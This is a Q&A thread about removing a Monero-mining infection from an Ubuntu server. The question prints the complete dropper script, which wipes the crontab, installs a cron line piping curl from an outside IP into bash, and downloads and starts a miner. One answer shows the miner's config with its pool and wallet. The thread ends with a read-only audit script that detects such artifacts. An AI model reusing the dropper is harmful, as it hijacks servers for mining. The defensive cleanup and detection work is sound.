suppoie malware removal (script hidden in .jpg)

Found this on an Ubuntu 16.04 server.
Malware I guess, but is there a guide to make sure I can clean it all out?

    curl -s http://158.69.133.18:8220/logo7.jpg

    #!/bin/sh
    ps aux | grep -vw suppoie | awk '{if($3>40.0) print $2}' | while read procid
    do
    kill -9 $procid
    done
    rm -rf /dev/shm/jboss
    ps -fe|grep -w suppoie |grep -v grep
    if [ $? -eq 0 ]
    then
    pwd
    else
    crontab -r || true &&
    echo "* * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s" >> /tmp/cron || true &&
    crontab /tmp/cron || true &&
    rm -rf /tmp/cron || true &&
    curl -o /var/tmp/config.json http://158.69.133.18:8220/1.json
    curl -o /var/tmp/suppoie http://158.69.133.18:8220/rig
    chmod 777 /var/tmp/suppoie
    cd /var/tmp
    proc=`grep -c ^processor /proc/cpuinfo`
    cores=$((($proc+1)/2))
    num=$(($cores*3))
    /sbin/sysctl -w vm.nr_hugepages=`$num`
    nohup ./suppoie -c config.json -t `echo $cores` >/dev/null &
    fi
    sleep 3
    echo "runing....."

edited May 3 at 5:54
Melebius

asked Apr 19 at 23:17
R Netz

  • You should restore from a system backup. serverfault.com/q/218005
    – dsstorefile1
    Apr 19 at 23:24

  • It's done and the system seems clean. I think it's related to Drupal's security issues.
    – R Netz
    Apr 19 at 23:55

  • The only true way to clean your system in a sure-fire way is to nuke it from orbit and start 'fresh' from known clean backups.
    – Thomas Ward♦
    Apr 24 at 19:20

2 Answers

It is in your www-data cron:

    sudo crontab -e -u www-data

You'll see something like:

    * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s

Kill the process, then clear it out of /var/tmp.

answered Apr 24 at 19:18
automan

I guess this is bitcoin mining malware; someone found out about Drupal's security breach and put this script on my server as well.

In my case it is in /var/spool/cron/crontabs/ and also curls something like

    * * * * * curl -s http://158.69.133.18:8220/logo7.jpg | bash -s

and the script is in /var/tmp/config.json and suppoie, which looks like this:

    {
        "algo": "cryptonight", // cryptonight (default) or cryptonight-lite
        "av": 0, // algorithm variation, 0 auto select
        "background": true, // true to run the miner in the background
        "colors": true, // false to disable colored output
        "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
        "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
        "donate-level": 1, // donate level, mininum 1%
        "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
        "max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
        "print-time": 60, // print hashrate report every N seconds
        "retries": 5, // number of times to retry before switch to backup server
        "retry-pause": 5, // time to pause between retries
        "safe": false, // true to safe adjust threads and av settings for current CPU
        "threads": null, // number of miner threads
        "pools": [
            {
                "url": "stratum+tcp://monerohash.com:5555", // URL of mining server
                "user": "41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo", // username for mining server
                "pass": "x", // password for mining server
                "keepalive": true, // send keepalived for prevent timeout (need pool support)
                "nicehash": false // enable nicehash/xmrig-proxy support
            }
        ],
        "api": {
            "port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
            "access-token": null, // access token for API
            "worker-id": null // custom worker-id for API
        }
    }

Deleted the line in crontabs and cleared /var/tmp/; seems to have worked.

answered Apr 26 at 17:14
Henry Zhang
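
Both answers locate the same three artifacts by hand: a per-user crontab entry that pipes a download into bash, an xmrig-style config.json next to the miner in /var/tmp, and the miner process itself. The script below is an added example, not code from the post or either answer, that turns those checks into read-only audit helpers; it assumes a Linux host with /proc, grep -E and readlink, root for full process visibility, and the `--audit` flag and function names are its own.

```shell
#!/bin/sh
# Added example, not code from the Ask Ubuntu post or its answers: read-only
# audit helpers for the artifacts the two answers describe, a per-user crontab
# line that pipes a curl/wget download into a shell, an xmrig-style config.json
# whose pool URL speaks stratum, and a running process whose binary lives in a
# scratch directory such as /var/tmp or /dev/shm. Directories and files are
# parameters so the checks can be exercised on constructed samples.

# Print "file:line" for every non-comment crontab line under directory $1
# (e.g. /var/spool/cron/crontabs or /etc/cron.d) that downloads with curl or
# wget and pipes the result into sh or bash. Prints nothing and returns 0
# when the directory is missing or clean.
suspicious_cron_lines() {
    [ -d "$1" ] || return 0
    grep -HE '^[^#]*(curl|wget)[[:space:]].*[|][[:space:]]*(ba)?sh([[:space:]]|$)' \
        "$1"/* 2>/dev/null || :
}

# Return 0 when file $1 looks like an xmrig-style miner config: it has a
# "pools" key and a pool "url" that uses the stratum mining protocol.
looks_like_miner_config() {
    [ -f "$1" ] || return 1
    grep -q '"pools"' "$1" &&
        grep -Eq '"url"[[:space:]]*:[[:space:]]*"stratum[+](tcp|ssl)://' "$1"
}

# Return 0 when executable path $1 is under a world-writable scratch directory;
# the dropper in the question stages its miner in /var/tmp and touches /dev/shm.
exe_in_scratch_dir() {
    case "$1" in
        /var/tmp/*|/tmp/*|/dev/shm/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print "pid exe" for live processes whose binary is in a scratch directory.
# Linux only: reads /proc/<pid>/exe (run as root to see every process). A
# " (deleted)" suffix means the binary was unlinked after it started.
processes_from_scratch_dirs() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        if exe_in_scratch_dir "$exe"; then
            echo "${p#/proc/} $exe"
        fi
    done
    return 0
}

# Run every check against the real locations and print the findings.
# Nothing is killed or deleted: confirm each finding before cleaning up.
audit_host() {
    echo "== crontab lines piping a download into a shell =="
    suspicious_cron_lines /var/spool/cron/crontabs
    suspicious_cron_lines /etc/cron.d
    echo "== miner-style configs in scratch directories =="
    for f in /var/tmp/*.json /tmp/*.json /dev/shm/*.json; do
        if [ -f "$f" ] && looks_like_miner_config "$f"; then
            echo "$f"
        fi
    done
    echo "== processes running from scratch directories =="
    processes_from_scratch_dirs
    return 0
}

if [ "${1:-}" = "--audit" ]; then
    audit_host
fi
```

Run it as root with `--audit` on the affected host; it only reports, so the kill and crontab cleanup from the answers stay manual steps, and restoring from a known clean backup, as the comments advise, remains the safer end state.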
